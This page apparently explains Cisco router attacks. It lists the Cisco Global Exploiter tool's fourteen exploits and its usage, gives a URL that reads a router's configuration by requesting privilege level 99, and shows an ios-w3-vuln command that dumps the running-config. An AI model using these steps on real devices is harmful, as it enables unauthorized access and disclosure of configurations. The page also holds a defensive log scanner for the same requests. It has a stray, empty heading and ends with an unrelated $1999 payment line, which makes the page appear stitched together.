Cisco Global Exploiter (CGE)
CGE is an attempt to combine all of the Cisco attacks into one tool.
perl cge.pl <target> <vulnerability number>
Vulnerabilities list:
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability
HTTP Arbitrary Access vulnerability
A common security flaw (of its time!) was/is the HTTP Arbitrary Access vulnerability. This flaw allowed an external attacker to execute router commands via the web interface.
Cisco devices have a number of privilege levels. These levels start at 0 (User EXEC) and go up to 100, although mostly only the first 15 are used. Level 15 is Privileged EXEC mode, the same as enable mode.
By referring to these levels within the URL of the target device, an attacker could pass commands to the router and have them execute in Privileged EXEC mode.
Web browse to the Cisco device: http://<IP>
Click cancel to the logon box and enter the following address: http://<IP>/level/99/exec/show/config
You may have to scroll through all of the levels from 16-99 for this to work.
To raise the logging level to only log emergencies:
A CLI tool automatically scrolls through all available privilege levels to identify whether any are vulnerable to this attack. This tool is called ios-w3-vuln (although it may have other names). As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running-config file to a TFTP server running locally.
./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
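A defender-side check for the request pattern described above, as an added example that is not part of the original page: it scans web or proxy access logs for /level/<n>/ requests with n in 16-99 and marks sources that walk through several levels, as ios-w3-vuln does. The log lines, addresses, status codes and the sweep threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample in Common Log Format (assumed to come from a proxy in
# front of the device's web interface); addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:09:00:01 +0000] "GET /level/15/exec/show/version HTTP/1.0" 401 0
198.51.100.7 - - [10/Mar/2024:09:00:02 +0000] "GET /level/16/exec/show/config HTTP/1.0" 401 0
198.51.100.7 - - [10/Mar/2024:09:00:02 +0000] "GET /level/17/exec/show/config HTTP/1.0" 401 0
198.51.100.7 - - [10/Mar/2024:09:00:03 +0000] "GET /level/18/exec/show/config HTTP/1.0" 200 4312
203.0.113.20 - - [10/Mar/2024:09:05:00 +0000] "GET /level/%39%39/exec/show/config HTTP/1.0" 200 4312
192.0.2.5 - - [10/Mar/2024:09:06:00 +0000] "GET /index.html HTTP/1.0" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
LEVEL_RE = re.compile(r'^/level/(\d+)/', re.IGNORECASE)

def find_level_requests(log_text):
    """Return (source, level, path, status) for requests naming level 16-99."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        src, _method, raw_path, status = m.groups()
        path = unquote(raw_path)  # decode first so encoded digits still match
        lvl = LEVEL_RE.match(path)
        if lvl and 16 <= int(lvl.group(1)) <= 99:
            hits.append((src, int(lvl.group(1)), path, int(status)))
    return hits

def summarise(hits, sweep_threshold=3):
    """Group hits per source; 'sweep' means several distinct levels were tried."""
    by_src = defaultdict(lambda: {"levels": set(), "served": []})
    for src, level, path, status in hits:
        by_src[src]["levels"].add(level)
        if 200 <= status < 300:  # assumption: 2xx means the request was answered
            by_src[src]["served"].append(path)
    return {src: {"sweep": len(d["levels"]) >= sweep_threshold,
                  "levels": sorted(d["levels"]), "served": d["served"]}
            for src, d in by_src.items()}

if __name__ == "__main__":
    for src, info in summarise(find_level_requests(SAMPLE_LOG)).items():
        print(src, info)
```

Any entry under "served" is worth treating as a possible configuration disclosure and reviewing on the device itself.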
To receive your Cisco Vulnerability Assessment, please submit your payment of $1999.00. If more than 100 miles of travel will be required, the additional cost will be billed separately.